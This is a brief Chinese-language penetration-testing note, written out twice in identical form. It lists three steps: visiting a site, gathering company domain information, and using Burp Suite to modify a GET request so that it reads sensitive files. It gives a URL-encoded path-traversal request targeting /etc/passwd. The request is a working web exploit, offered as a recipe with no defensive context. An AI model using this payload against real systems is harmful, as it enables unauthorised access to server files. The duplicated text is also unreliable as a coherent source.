一、访问网页
二、公司信息域名收集
三、抓包读取敏感文件
Burpsuite抓包,修改GET请求即可(GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
)
一、访问网页
二、公司信息域名收集
三、抓包读取敏感文件
Burpsuite抓包,修改GET请求即可(GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
)